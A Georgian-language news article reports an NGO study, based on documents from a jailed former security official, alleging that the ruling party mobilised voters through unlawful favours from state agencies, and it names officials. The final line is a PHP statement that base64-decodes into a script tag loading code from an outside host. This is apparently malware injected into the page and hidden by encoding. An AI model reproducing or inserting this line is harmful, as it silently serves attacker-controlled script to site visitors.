celsiusi
ავერსი საქკაბელი
მმართველ პარტიის სასარგებლოდ, არაკანონიერი გზებით, ამომრჩევლის მობილიზების მასშტაბურ სქემა - არასამთავრობო ორგანიზაციები ასაჯაროებენ ანგარიშს, სადაც სუს-ის ყოფილი მაღალჩინოსნის, ამჟამად პატიმრობაში მყოფი სოსო გოგაშვილის მიერ გადაცემული ინფორმაციაა წარმოდგენილი. 
 
"საერთაშორისო გამჭვირვალობა" და "სამართლიანი არჩევნები" აცხადებენ, რომ მაღალი ალბათობით დასტურდება სახელმწიფო უწყებების, მათ შორის სამართალდამცავი ორგანოების პარტიული მიზნით გამოყენება.
 
"ამ ინფორმაციის თანახმად, მმართველი პარტიის წარმომადგენლები სხვადასხვა სახელმწიფო უწყების სერვისების გამოყენებით, კონკრეტულ პირებს სავარაუდოდ სთავაზობდნენ პირობითი მსჯავრის გაუქმებას, პენიტენციური დაწესებულებიდან ვადაზე ადრე გათავისუფლებას, შეჩერებული ან ჩამორთმეული მართვის უფლების აღდგენას, მიმდინარე სისხლის სამართლის საქმეზე ბრალდების შემსუბუქებას [გადაკვალიფიცირებას], სასჯელის მოხდის პირობების გაუმჯობესებას, წვევამდელთა სამხედრო სამსახურის მოხდის ვალდებულების გადავადებას და ა.შ." ნათქვამია ანგარიშში. 
 
„საერთაშორისო გამჭვირვალობა - საქართველომ” და „სამართლიანმა არჩევნებმა” შეისწავლეს დოკუმენტაცია, რომლებიც სავარაუდოდ მმართველი პარტიის - „ქართული ოცნების” მიერ შექმნილი ელექტრონული ფოსტის ელ-ფოსტის ეს მისამართი დაცულია სპამ-ბოტებისგან. ნახვისთვის უნდა გქონდეთ ჩართული JavaScript., 2018-2019 წლების კორესპონდენციასა და 2020 წლით დათარიღებულ დოკუმენტაციას მოიცავდა. ამასთანავე, საჯარო ინფორმაციის მეშვეობით გადამოწმდა დოკუმენტებში არსებული გარკვეული მონაცემები.
 
კვლევაში დასახელებულია კონკრეტული გვარებიც:
 
"როგორც დოკუმენტებიდან გამოიკვეთა, მმართველ პარტიასთან ერთად ამ სისტემის შემსრულებლები, მათ შორის, სავარაუდოდ მაშინდელი იუსტიციის მინისტრის მოადგილე გიორგი პატარიძე და შინაგან საქმეთა სამინისტროს გენერალური ინსპექციის უფროსი ალექსანდრე ხოჯევანიშვილი იყვნენ."
524
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");